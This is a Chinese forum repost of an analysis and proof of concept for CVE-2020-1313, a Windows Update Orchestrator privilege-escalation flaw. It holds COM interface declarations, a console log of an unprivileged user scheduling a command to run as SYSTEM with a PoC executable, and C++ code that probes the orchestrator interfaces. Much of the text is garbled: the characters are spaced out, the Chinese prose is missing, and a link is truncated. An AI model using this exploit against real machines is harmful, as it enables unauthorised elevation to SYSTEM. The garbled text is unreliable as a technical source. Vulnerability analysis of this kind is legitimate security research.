搜索

[15731] 2020-08-15_CVE-2020-1313漏洞分析与利用PoC

文档创建者:s7ckTeam
浏览次数:37
最后更新:2025-01-18
2020-08-15_CVE-2020-1313漏洞分析与利用PoC C V E - 2 0 2 0 - 1 3 1 3 P o C   A l p h a _ h 4 c k   F r e e B u f   2 0 2 0 - 0 8 - 1 5 W i n d o w s   U p d a t e   O r c h e s t r a t o r   S e r v i c e D C O M W i n d o w s 使 W i n d o w s W i n d o w s   1 0 W i n d o w s   S e r v e r   C o r e U n i v e r s a l O r c h e s t r a t o r 9 C 6 9 5 0 3 5 - 4 8 D 2 - 4 2 2 9 - 8 B 7 3 - 4 C 7 0 E 7 5 6 E 5 1 9 u s o s v c . d l l N T _ A U T H O R I T Y S Y S T E M B U I L T I N U s e r s 访 使 C O M I U n i v e r s a l O r c h e s t r a t o r c 5 3 f 3 5 4 9 - 0 d b f - 4 2 9 a - 8 2 9 7 - c 8 1 2 b a 0 0 7 4 2 d C O M   A P I 访 S c h e d u l e W o r k c : w i n d o w s s y s t e m 3 2 P r o g r a m   F i l e s c : w i n d o w s s y s t e m 3 2 c m d . e x e N T _ A U T H O R I T Y S Y S T E M P o C v i r t u a l   H R E S U L T   _ _ s t d c a l l   H a s M o r a t o r i u m P a s s e d ( w c h a r _ t *   u s c h e d u l e d I d ,   i n t 6 4 _ t *   p 1 ) ; / / u s o s v c ! U n i v e r s a l O r c h e s t r a t o r : : H a s M o r a t o r i u m P a s s e d v i r t u a l   H R E S U L T   _ _ s t d c a l l   S c h e d u l e W o r k ( w c h a r _ t *   u s c h e d u l e d I d ,   w c h a r _ t *   c m d L i n e ,   w c h a r _ t *   s t a r t A r g ,   w c h a r _ t *   p a u s e A r g ) ; / / u s o s v c ! U n i v e r s a l O r c h e s t r a t o r : : S c h e d u l e W o r k v i r t u a l   H R E S U L T   _ _ s t d c a l l   W o r k C o m p l e t e d ( w c h a r _ t *   u s c h e d u l e d I d ,   i n t 6 4 _ t   p 1 ) ; / / u s o s v c ! U n i v e r s a l O r c h e s t r a t o r : : W o r k C o m p l e t e d C : 1 1 1 > w h o a m i d e s k t o p - 4 3 r n l k u u n p r i v i l e g e d C : 1 1 1 > w h o a m i   / p r i v P R I V I L E G E S   I N F O R M A T I O N - - - - - - - - - - - - - - - - - - - - - - P r i v i l e g e   N a m e                                 D e s c r i p t i o n                                                     S t a t e = = = = = = = = = = = = = = = = = = = = = = = = = = = = =   = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =   = = = = = = = = S e S h u t d o w n P r i v i l e g e                       S h u t   d o w n   t h e   s y s t e m                                   D i s a b l e d S e C h a n g e N o t i f y P r i v i l e g e               B y p a s s   t r a v e r s e   c h e c k i n g                           E n a b l e d S e U n d o c k P r i v i l e g e                           R e m o v e   c o m p u t e r   f r o m   d o c k i n g   s t a t i o n   D i s a b l e d S e I n c r e a s e W o r k i n g S e t P r i v i l e g e   I n c r e a s e   a   p r o c e s s   w o r k i n g   s e t               D i s a b l e d S e T i m e Z o n e P r i v i l e g e                       C h a n g e   t h e   t i m e   z o n e                                   D i s a b l e d C : 1 1 1 > w h o a m i   / p r i v C : 1 1 1 > U n i v e r s a l O r c h e s t r a t o r P r i v E s c P o c . e x e O b t a i n i n g   r e f e r e n c e   t o   I U n i v e r s a l O r c h e s t r a t o r S c h e d u i n g   w o r k   w i t h   i d   5 6 5 9 4 S u c c e e d e d .   Y o u   m a y   v e r i f y   H K E Y _ L O C A L _ M A C H I N E S O F T W A R E M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n W i n d o w s U p d a t e O r c h e s t r a t o r U S c h e d u l e r   t o   s e e   t h e   t a s k   h a s   i n d e e d   b e e n   o n b o a r d e d .   T h e   c o m m a n d   i t s e l f   w i l l   b e   e x e c u t e d   o v e r n i g h t  
2 3 : 2 0 O l e V i e w . N E T U S O C L S I D / I I D 2 0 2 0 6 C o I m p e r s o n a t e C l i e n t   A P I : v o i d   T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e A g a i n s t S e r v i c e ( I I D &   c l s I d ,   c o n s t   c h a r *   c l a s s N a m e ,   c o n s t   w c h a r _ t *   i i d S t r ,   c o n s t   c h a r   * i n t e r f a c e N a m e ) { v o i d   * s s   =   N U L L ; I I D   i i d ; T h r o w O n E r r o r ( I I D F r o m S t r i n g ( i i d S t r ,   ( L P C L S I D ) & i i d ) ) ;   / /   w o r k i n g   w i t h   e   a t   t h e   e n d ,   f a i l i n g   w i t h   a n y t h i n g   e l s e H R E S U L T   r e s   =   C o C r e a t e I n s t a n c e ( c l s I d ,   n u l l p t r ,   C L S C T X _ L O C A L _ S E R V E R ,   i i d ,   ( L P V O I D * ) & s s ) ; p r i n t f ( " % s   % s :   % s n " ,   c l a s s N a m e ,   i n t e r f a c e N a m e ,   r e s   = =   S _ O K   ?   " W O R K I N G "   :   " f a i l u r e " ) ; } v o i d   T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e ( c o n s t   w c h a r _ t *   i i d S t r ,   c o n s t   c h a r   * i n t e r f a c e N a m e ) { / /   T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e A g a i n s t S e r v i c e ( C L S I D _ A u t o m a t i c U p d a t e s ,   " A u t o m a t i c U p d a t e s " ,   i i d S t r ,   i n t e r f a c e N a m e ) ;   / /   t i m e o u t i n g ! T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e A g a i n s t S e r v i c e ( C L S I D _ U x U p d a t e M a n a g e r ,   " U x U p d a t e M a n a g e r " ,   i i d S t r ,   i n t e r f a c e N a m e ) ; T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e A g a i n s t S e r v i c e ( C L S I D _ U s o S e r v i c e ,   " U s o S e r v i c e " ,   i i d S t r ,   i n t e r f a c e N a m e ) ; T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e A g a i n s t S e r v i c e ( C L S I D _ U p d a t e S e s s i o n O r c h e s t r a t o r ,   " U p d a t e S e s s i o n O r c h e s t r a t o r " ,   i i d S t r ,   i n t e r f a c e N a m e ) ; T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e A g a i n s t S e r v i c e ( C L S I D _ U n i v e r s a l O r c h e s t r a t o r ,   " U n i v e r s a l O r c h e s t r a t o r " ,   i i d S t r ,   i n t e r f a c e N a m e ) ; / /   T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e A g a i n s t S e r v i c e ( C L S I D _ S o m e S e r v i c e ,   " S o m e S e r v i c e " ,   i i d S t r ,   i n t e r f a c e N a m e ) ;   / /   t i m e o u t i n g ! } . . . T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e ( L " { c 5 7 6 9 2 f 8 - 8 f 5 f - 4 7 c b - 9 3 8 1 - 3 4 3 2 9 b 4 0 2 8 5 a } " ,   " I M o U s o O r c h e s t r a t o r " ) ; T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e ( L " { 4 2 8 4 2 0 2 d - 4 d c 1 - 4 c 6 8 - a 2 1 e - 5 c 3 7 1 d d 9 2 6 7 1 } " ,   " I M o U s o U p d a t e " ) ; T e s t U p d a t e O r c h e s t r a t o r I n t e r f a c e ( L " { c 8 7 9 d d 7 3 - 4 b d 2 - 4 b 7 6 - 9 d d 8 - 3 b 9 6 1 1 3 a 2 1 3 0 } " ,   " I M o U s o U p d a t e C o l l e c t i o n " ) ;                 / /   . . .   a n d   h u n d r e d s   o f   m o r e U n i v e r s a l O r c h e s t r a t o r   I U n i v e r s a l O r c h e s t r a t o r :   W O R K I N G U p d a t e S e s s i o n O r c h e s t r a t o r   I U p d a t e S e s s i o n O r c h e s t r a t o r :   W O R K I N G U x U p d a t e M a n a g e r   I U x U p d a t e M a n a g e r :   W O R K I N G
A P I 访 H K E Y _ L O C A L _ M A C H I N E U S O   A P I h t t p s : / / p o r t a l . m s r c . m i c r o s o f t . c o m / e n - U S / s e c u r i t y - g u i d a n c e / a d v i s o r y / C V E - 2 0 2 0 - 1 3 1
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理